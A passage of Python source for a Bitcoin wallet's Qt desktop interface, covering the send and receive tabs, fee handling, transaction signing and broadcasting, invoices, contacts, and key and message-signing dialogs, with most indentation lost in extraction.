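        # Show or hide the detached QR window, remembering its geometry across toggles.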
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
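            # Fee slider callback: store either the dynamic fee level or the static
            # fee per kB, then recompute the amount and fee fields.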
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
               _('and you will have the possibility, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
        self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
                except Exception:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
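        # Collect (outputs, fee, label, coins) from the Send tab, validating the
        # payment request expiry, pay-to errors, addresses and amounts first.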
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
            msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
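        # Broadcast on a background thread via WaitingDialog. If this pays a BIP70
        # payment request, mark the invoice as paid and send an ACK with a refund address.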
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
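        # Freeze the Send tab fields while a payment request is being fetched.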
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
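        # Verify the fetched payment request against our contacts and notify the GUI
        # through the payment_request_ok / payment_request_error signals.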
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getOpenFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
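        # Expose each public Commands method in the console namespace, wrapped so it
        # is dispatched through c._run with the password dialog available.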
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf8')
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot verify messages with this type of address.' + '\n\n' + self.msg_sign)
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
